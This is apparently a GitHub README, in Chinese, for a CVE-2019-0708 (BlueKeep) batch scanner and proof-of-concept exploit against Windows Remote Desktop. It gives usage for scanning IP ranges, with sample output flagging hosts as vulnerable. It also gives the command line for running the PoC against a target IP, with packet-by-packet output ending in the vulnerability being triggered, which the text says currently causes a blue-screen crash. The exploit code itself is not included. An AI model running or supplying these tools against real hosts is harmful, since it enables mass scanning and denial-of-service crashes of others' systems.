skommando/CVE-2019-0708

CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC，暂时只有蓝屏。

CVE-2019-0708

CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC，暂时只有蓝屏。

0x01 扫描 - windows

usage：
rdpscan.exe ip1-ip2

> .\rdpscan.exe 192.168.1.1-192.168.1.2
192.168.1.1 - VULNERABLE - CVE-2019-0708
192.168.1.2 - SAFE - CredSSP/NLA required

rdpscan.exe --file ip.txt

> .\rdpscan.exe --file ip.txt
192.168.1.1 - VULNERABLE - CVE-2019-0708
192.168.1.2 - SAFE - CredSSP/NLA required

0x02 POC利用

usage：
python poc.py ip 系统位数

> python .\cve-2019-0708-poc.py 192.168.1.1 32
[+] ClientData Packet Sent
[+] ChannelJoin/ErectDomain/AttachUser Sent
[+] ClientInfo Packet Sent
[+] ConfirmActive Packet Sent
[+] Session Established
[+] Vuln Should Trigger